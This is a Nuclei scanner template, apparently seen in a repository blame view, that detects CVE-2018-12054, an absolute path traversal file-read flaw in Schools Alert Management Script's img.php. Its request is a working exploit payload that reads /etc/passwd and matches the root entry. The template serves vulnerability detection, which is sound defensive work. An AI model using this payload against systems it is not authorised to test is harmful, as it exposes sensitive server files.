nuclei-templates/cves/2018/CVE-2018-12054.yaml

37 lines
954 B
YAML
Raw Normal View History

2021-10-18 13:04:38 +00:00
id: CVE-2018-12054
info:
name: Schools Alert Management Script - Arbitrary File Read
author: wisnupramoedya
severity: high
description: Schools Alert Management Script is susceptible to an arbitrary file read vulnerability via the f parameter in img.php, aka absolute path traversal.
2021-10-18 13:04:38 +00:00
reference:
- https://www.exploit-db.com/exploits/44874
- https://nvd.nist.gov/vuln/detail/CVE-2018-12054
- https://github.com/unh3x/just4cve/issues/4
- https://www.exploit-db.com/exploits/44874/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-12054
cwe-id: CWE-22
tags: cve,cve2018,lfi
2021-10-18 13:04:38 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/img.php?f=/./etc/./passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2021-10-18 13:04:38 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/04/26